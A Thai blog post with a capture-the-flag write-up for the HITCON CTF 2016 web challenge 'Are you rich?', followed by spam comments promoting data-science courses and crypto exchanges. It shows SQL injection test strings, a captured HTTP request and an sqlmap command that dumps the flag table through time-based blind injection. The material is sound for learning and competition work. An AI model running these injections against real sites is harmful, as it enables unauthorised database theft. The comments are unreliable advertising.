หน้าเว็บ

วันจันทร์ที่ 10 ตุลาคม พ.ศ. 2559

HITCON CTF 2016: Are you rich? (Web) Write-up


Descriptions:
Are you rich? Buy the flag!
http://52.197.140.254/are_you_rich/
ps. You should NOT pay anything for this challenge
Some error messages which is non-related to challenge have been removed
Solution:

1. Access to website have 2 functions, Get our bitcoin address and Verify payment.


2. Try to get our bitcoin address, It will generate some Bitcoin Address and go to verify it.


3. Not have enough money, I guess after get our bitcoin it may insert this bitcoin into database and have verify payment to check. I try to SQL Injection in Address field.

4. ' or 1=1# --- Found more than 1 records?


5. ' or 1=2# --- does not have enough confirmed money?


4. Confirm the parameter address have vulnerable to SQL Injection, I use Burp Suite to capture HTTP request and copy it to text file.

POST /are_you_rich/verify.php?address=1DK8jRKE5JKTdMKpPN4VAUkYRwwjYcDm2c HTTP/1.1
Host: 52.197.140.254
Proxy-Connection: keep-alive
Content-Length: 79
Cache-Control: max-age=0
Origin: http://52.197.140.254
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: http://52.197.140.254/are_you_rich/verify.php?address=1DK8jRKE5JKTdMKpPN4VAUkYRwwjYcDm2c
Accept-Encoding: gzip, deflate
Accept-Language: th,en;q=0.8

address=1DK8jRKE5JKTdMKpPN4VAUkYRwwjYcDm2c&flag_id=flag1&submit=

5. Using SQLmap -r option to Load HTTP request from a text file, SQLmap verify this vulnerable is Time-Based Blind SQL Injection, and final SQLmap option that use for get a flag.

python sqlmap.py -r web50.txt -p address --threads=5 --technique=T --dbms=mysql --dbs --string="Found more than" -D areyourich -T flag1 -C flag --dump

6. Wait a several minute to retrieve a flag.


In Burp Suite (Union Based)


Flag: hitcon{4r3_y0u_r1ch?ju57_buy_7h3_fl4g!!}

13 ความคิดเห็น:

 1. I was very happy to find this site. I really enjoyed reading this article today and think it might be one of the best articles I have read so far. I wanted to thank you for this excellent reading !! I really enjoy every part and have bookmarked you to see the new things you post. Well done for this excellent article. Please keep this work of the same quality.
  Data Science Course in Bangalore

  ตอบลบ
 2. Btcturk,Binance,Paribu güvenilir mi değil mi yazlarımız:


  Btcturk güvenilir mi diye merak ediyorsanız tıklayın: btcturk güvenilir mi
  Binance güvenilir mi diye merak ediyorsanız tıklayın: binance güvenilir mi
  Paribu güvenilir mi diye merak ediyorsanız tıklayın: paribu güvenilir mi

  Binance güvenilir mi diye merak ediyorsanız tıklayın: binance güvenilir mi

  ตอบลบ
 3. Excellent Blog! I would like to thank for the efforts you have made in writing this post. I am hoping the same best work from you in the future as well. I wanted to thank you for this websites! Thanks for sharing. Great websites!
  Data Science Training in Bangalore

  ตอบลบ
 4. I am a new user of this site, so here I saw several articles and posts published on this site, I am more interested in some of them, hope you will provide more information on these topics in your next articles.
  data analytics training in bangalore

  ตอบลบ
 5. I just got to this amazing site not long ago. I was actually captured with the piece of resources you have got here. Big thumbs up for making such wonderful blog page!
  data analytics course in bangalore

  ตอบลบ
 6. Great post i must say and thanks for the information. Education is definitely a sticky subject. However, is still among the leading topics of our time. I appreciate your post and look forward to more.
  Data Science Course in Bangalore

  ตอบลบ
 7. Binance, BTCTurk, Paribu sahibi kim merak ediyorsanız tıklayın: Binance, BTCTurk, Paribu Sahibi

  Binance, BTCTurk, Paribu ne zaman kuruldu merak ediyorsanız tıklayın: Binance, BTCTurk, Paribu Ne Zaman Kuruldu

  Komisyon oranları için tıklayın: BtcTurk, Binance, Paribu Güvenilir mi? Komisyon Oranları

  Hangisi güvenilir merak ediyorsanız tıklayın: Btcturk, Binance, Paribu Güvenilir mi

  ตอบลบ